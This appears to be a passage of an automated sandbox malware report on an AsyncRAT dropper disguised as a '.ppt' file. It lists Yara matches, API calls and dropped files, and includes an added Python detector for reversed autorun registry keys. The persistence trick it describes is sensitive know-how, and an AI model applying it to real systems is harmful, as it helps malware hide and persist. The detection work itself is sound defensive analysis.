          Source: 15.3.cipkucw.ppt.exe.175e018.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
          Source: 15.3.cipkucw.ppt.exe.175e018.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
          Source: 15.3.cipkucw.ppt.exe.175e018.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 6.3.cipkucw.ppt.fb2828.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
          Source: 6.3.cipkucw.ppt.fb2828.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
          Source: 6.3.cipkucw.ppt.fb2828.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 6.3.cipkucw.ppt.f91818.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
          Source: 6.3.cipkucw.ppt.f91818.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
          Source: 6.3.cipkucw.ppt.f91818.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 19.3.cipkucw.ppt.exe.1854810.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
          Source: 19.3.cipkucw.ppt.exe.1854810.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
          Source: 19.3.cipkucw.ppt.exe.1854810.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 19.3.cipkucw.ppt.exe.1875820.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
          Source: 19.3.cipkucw.ppt.exe.1875820.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
          Source: 19.3.cipkucw.ppt.exe.1875820.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 00000011.00000003.2138978432.0000000003626000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
          Source: 00000011.00000003.2138978432.0000000003626000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 0000000F.00000003.2001032731.000000000173E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
          Source: 0000000F.00000003.2001032731.000000000173E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 0000000F.00000003.2000519761.000000000174E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
          Source: 0000000F.00000003.2000519761.000000000174E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 00000006.00000003.1874054223.000000000361A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
          Source: 00000006.00000003.1874054223.000000000361A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 00000013.00000003.2219656121.0000000001845000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
          Source: 00000013.00000003.2219656121.0000000001845000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 0000000F.00000003.2000805264.0000000003E3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
          Source: 0000000F.00000003.2000805264.0000000003E3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 00000006.00000003.1873750371.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 0000000F.00000003.2000748696.000000000174E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 00000006.00000003.1873380040.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
          Source: 00000006.00000003.1873380040.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 00000010.00000002.2048370610.0000000000762000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
          Source: 00000010.00000002.2048370610.0000000000762000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 00000011.00000003.2139352487.0000000000D26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
          Source: 00000011.00000003.2139352487.0000000000D26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 00000013.00000003.2219758241.0000000003CBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
          Source: 00000013.00000003.2219758241.0000000003CBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 00000013.00000003.2218782677.0000000001866000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
          Source: 00000013.00000003.2218782677.0000000001866000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 00000011.00000003.2138543622.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
          Source: 00000011.00000003.2138543622.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 00000013.00000003.2219549632.0000000001866000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 00000011.00000003.2138854777.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 00000006.00000003.1874482943.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
          Source: 00000006.00000003.1874482943.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 0000000F.00000003.2001114393.0000000001628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
          Source: 0000000F.00000003.2001114393.0000000001628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 00000013.00000003.2219993576.0000000001854000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
          Source: 00000013.00000003.2219993576.0000000001854000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: Process Memory Space: RegSvcs.exe PID: 2368, type: MEMORYSTR | Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
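
The third rule in the matches above, "Detects file containing reversed ASEP Autorun registry keys", fires on the trick behind many .NET RATs' persistence strings: the autostart key path is stored backwards (so a forward-string scan for `CurrentVersion\Run` finds nothing) and reversed only at run time, right before the registry write. The block below is an added example that mirrors that idea over a raw unpacked buffer or memory dump; it is not the ditekSHen rule itself and not code from the report. The list of key paths, the two encodings searched (plain ASCII and the UTF-16LE of .NET string literals) and the sample buffer are this example's own.

```python
"""Find reversed autostart (ASEP) registry paths in a binary or memory dump.

Added example; it is not the Yara rule itself nor code from the report. The
path list and the sample buffer are this example's own.
"""
import re
from typing import List, Tuple

ASEP_PATHS = [
    r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    r"SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce",
    r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run",
    r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell",
    r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",
]
ENCODINGS = ("ascii", "utf-16-le")   # plain C strings and .NET / Windows wide strings


def _patterns():
    """One case-insensitive byte regex per (path, encoding) for the reversed text."""
    pats = []
    for path in ASEP_PATHS:
        reversed_text = path[::-1]                    # e.g. 'nuR\noisreVtnerruC\...'
        for enc in ENCODINGS:
            pats.append((path, enc, re.compile(re.escape(reversed_text.encode(enc)), re.IGNORECASE)))
    return pats


def find_reversed_asep(buf: bytes) -> List[Tuple[int, str, str]]:
    """Return (offset, encoding, original_path) for every reversed ASEP path in buf.

    A hit nested inside a longer hit (Run inside RunOnce) is dropped so each
    occurrence is reported once, as the most specific path.
    """
    spans = []
    for path, enc, pat in _patterns():
        for m in pat.finditer(buf):
            spans.append((m.start(), m.end(), enc, path))
    result = []
    for start, end, enc, path in sorted(spans):
        nested = any(s <= start and end <= e and (s, e) != (start, end) for s, e, _, _ in spans)
        if not nested:
            result.append((start, enc, path))
    return result


def constructed_sample() -> bytes:
    """A fake blob: a wide reversed Run key, a lower-case ASCII reversed RunOnce
    key, then a forward (legitimate) Run key that must not match."""
    return (b"MZ\x90\x00" + b"\x00" * 16
            + ASEP_PATHS[0][::-1].encode("utf-16-le")
            + b"\x00" * 8
            + ASEP_PATHS[1][::-1].lower().encode("ascii")
            + b"\x00" * 8
            + ASEP_PATHS[0].encode("ascii"))


def sample_hits():
    return find_reversed_asep(constructed_sample())


if __name__ == "__main__":
    for offset, enc, path in sample_hits():
        print(f"0x{offset:06x} {enc:9s} {path}")
```

Run it over the `.raw.unpack` artefacts listed above rather than the packed dropper: the report shows the rule matching only after unpacking and in process memory, which is exactly where the reversed literals become visible. Forward key paths are deliberately not reported; every legitimate installer touches `CurrentVersion\Run`, and it is the reversal that carries the signal.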
          Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exeCode function: 0_2_00279B5C: _wcslen,CreateFileW,CloseHandle,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00279B5C
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_00751A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,6_2_00751A91
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.pptCode function: 6_2_0075F122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,6_2_0075F122
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exeCode function: 15_2_0102F122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,15_2_0102F122
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe; Code function: 0_2_0028355D
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe; Code function: 0_2_0028B76F
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe; Code function: 0_2_0027BF3D
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe; Code function: 0_2_0028A008
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe; Code function: 0_2_0029C0D6
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe; Code function: 0_2_0028A222
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe; Code function: 0_2_00285214
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe; Code function: 0_2_0028C27F
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe; Code function: 0_2_002992D0
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe; Code function: 0_2_002A4360
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe; Code function: 0_2_002846CF
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe; Code function: 0_2_002A86D2
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe; Code function: 0_2_002A480E
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe; Code function: 0_2_002748AA
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe; Code function: 0_2_00275AFE
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe; Code function: 0_2_0028ABC8
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe; Code function: 0_2_0028BC05
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe; Code function: 0_2_00277CBA
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe; Code function: 0_2_00284D32
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe; Code function: 0_2_00273D9D
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe; Code function: 0_2_0029BEA7
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe; Code function: 0_2_00275F39
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe; Code function: 0_2_00285F0B
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt; Code function: 6_2_00718037
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt; Code function: 6_2_00712007
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt; Code function: 6_2_0070E0BE
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt; Code function: 6_2_006FE1A0
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt; Code function: 6_2_006F225D
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt; Code function: 6_2_007122C2
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt; Code function: 6_2_0072A28E
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt; Code function: 6_2_0070C59E
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt; Code function: 6_2_0077C7A3
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt; Code function: 6_2_0072E89F
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt; Code function: 6_2_0076291A
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt; Code function: 6_2_00726AFB
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt; Code function: 6_2_00758B27
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt; Code function: 6_2_0071CE30
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt; Code function: 6_2_00727169
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt; Code function: 6_2_007851D2
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt; Code function: 6_2_006F9240
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt; Code function: 6_2_006F9499
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt; Code function: 6_2_00711724
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt; Code function: 6_2_00711A96
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt; Code function: 6_2_006F9B60
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt; Code function: 6_2_00717BAB
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt; Code function: 6_2_00711D40
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt; Code function: 6_2_00717DDA
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe; Code function: 12_2_01B74158
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe; Code function: 12_2_01B74A28
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe; Code function: 12_2_01B75FE8
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe; Code function: 12_2_01B73E10
          Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe; Code function: 12_2_07B41B10
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe; Code function: 15_2_00FDE0BE
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe; Code function: 15_2_00FE8037
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe; Code function: 15_2_00FE2007
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe; Code function: 15_2_00FCE1A0
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe; Code function: 15_2_00FE22C2
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe; Code function: 15_2_00FFA28E
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe; Code function: 15_2_00FC225D
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe; Code function: 15_2_00FDC59E
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe; Code function: 15_2_0104C7A3
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe; Code function: 15_2_0103291A
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe; Code function: 15_2_00FFE89F
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe; Code function: 15_2_00FF6AFB
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe; Code function: 15_2_01028B27
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe; Code function: 15_2_00FECE30
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe; Code function: 15_2_010551D2
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe; Code function: 15_2_00FF7169
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe; Code function: 15_2_00FC9240
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe; Code function: 15_2_00FC9499
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe; Code function: 15_2_00FE1724
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe; Code function: 15_2_00FE1A96
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe; Code function: 15_2_00FE7BAB
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe; Code function: 15_2_00FC9B60
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe; Code function: 15_2_00FE7DDA
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe; Code function: 15_2_00FE1D40
          Source: Joe Sandbox View; Dropped File: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt 98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe; Code function: String function: 00FDFD60 appears 31 times
          Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe; Code function: String function: 00FE0DC0 appears 46 times
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt; Code function: String function: 00710DC0 appears 46 times
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt; Code function: String function: 0070FD60 appears 31 times
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe; Code function: String function: 002957A5 appears 34 times
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe; Code function: String function: 00296630 appears 31 times
          Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe; Code function: String function: 002957D8 appears 66 times
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006B08000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: OriginalFilenameAutoIt3.exeB vs yjOJ1YK5M3.exe
          Source: yjOJ1YK5M3.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Matched Yara rules (metadata as reported; identical for every hit below):
          Windows_Trojan_Asyncrat_11a11ba1: reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
          rat_win_asyncrat: author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
          INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse: author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: 17.3.cipkucw.ppt.exe.d56820.0.raw.unpack, type: UNPACKEDPE; Matched rules: Windows_Trojan_Asyncrat_11a11ba1, rat_win_asyncrat, INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse
          Source: 19.3.cipkucw.ppt.exe.1854810.1.raw.unpack, type: UNPACKEDPE; Matched rules: Windows_Trojan_Asyncrat_11a11ba1, rat_win_asyncrat, INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse
          Source: 16.2.RegSvcs.exe.760000.0.unpack, type: UNPACKEDPE; Matched rules: Windows_Trojan_Asyncrat_11a11ba1, rat_win_asyncrat, INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse
          Source: 17.3.cipkucw.ppt.exe.d35810.1.raw.unpack, type: UNPACKEDPE; Matched rules: Windows_Trojan_Asyncrat_11a11ba1, rat_win_asyncrat, INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse
          Source: 15.3.cipkucw.ppt.exe.175e018.0.raw.unpack, type: UNPACKEDPE; Matched rules: Windows_Trojan_Asyncrat_11a11ba1, rat_win_asyncrat, INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse
          Source: 6.3.cipkucw.ppt.fb2828.0.raw.unpack, type: UNPACKEDPE; Matched rules: Windows_Trojan_Asyncrat_11a11ba1, rat_win_asyncrat, INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse
          Source: 6.3.cipkucw.ppt.f91818.1.raw.unpack, type: UNPACKEDPE; Matched rules: Windows_Trojan_Asyncrat_11a11ba1, rat_win_asyncrat, INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse
          Source: 19.3.cipkucw.ppt.exe.1854810.2.raw.unpack, type: UNPACKEDPE; Matched rules: Windows_Trojan_Asyncrat_11a11ba1, rat_win_asyncrat, INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse
          Source: 19.3.cipkucw.ppt.exe.1875820.0.raw.unpack, type: UNPACKEDPE; Matched rules: Windows_Trojan_Asyncrat_11a11ba1, rat_win_asyncrat, INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse
          Source: 00000011.00000003.2138978432.0000000003626000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rules: Windows_Trojan_Asyncrat_11a11ba1, INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse
          Source: 0000000F.00000003.2001032731.000000000173E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rules: Windows_Trojan_Asyncrat_11a11ba1, INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse
          Source: 0000000F.00000003.2000519761.000000000174E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rules: Windows_Trojan_Asyncrat_11a11ba1, INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse
          Source: 00000006.00000003.1874054223.000000000361A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rules: Windows_Trojan_Asyncrat_11a11ba1, INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse
          Source: 00000013.00000003.2219656121.0000000001845000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rules: Windows_Trojan_Asyncrat_11a11ba1, INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse
          Source: 0000000F.00000003.2000805264.0000000003E3C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rules: Windows_Trojan_Asyncrat_11a11ba1, INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse
          Source: 00000006.00000003.1873750371.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rules: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse
          Source: 0000000F.00000003.2000748696.000000000174E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rules: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse
          Source: 00000006.00000003.1873380040.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rules: Windows_Trojan_Asyncrat_11a11ba1, INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse
          Source: 00000010.00000002.2048370610.0000000000762000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rules: Windows_Trojan_Asyncrat_11a11ba1, INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse
          Source: 00000011.00000003.2139352487.0000000000D26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rules: Windows_Trojan_Asyncrat_11a11ba1, INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse
          Source: 00000013.00000003.2219758241.0000000003CBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rules: Windows_Trojan_Asyncrat_11a11ba1, INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse
          Source: 00000013.00000003.2218782677.0000000001866000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rules: Windows_Trojan_Asyncrat_11a11ba1, INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse
          Source: 00000011.00000003.2138543622.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rules: Windows_Trojan_Asyncrat_11a11ba1, INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse
          Source: 00000013.00000003.2219549632.0000000001866000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rules: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse
          Source: 00000011.00000003.2138854777.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rules: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse
          Source: 00000006.00000003.1874482943.0000000000F82000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rules: Windows_Trojan_Asyncrat_11a11ba1, INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse
          Source: 0000000F.00000003.2001114393.0000000001628000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rules: Windows_Trojan_Asyncrat_11a11ba1, INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse
          Source: 00000013.00000003.2219993576.0000000001854000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY; Matched rules: Windows_Trojan_Asyncrat_11a11ba1, INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse
          Source: Process Memory Space: RegSvcs.exe PID: 2368, type: MEMORYSTR; Matched rules: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse
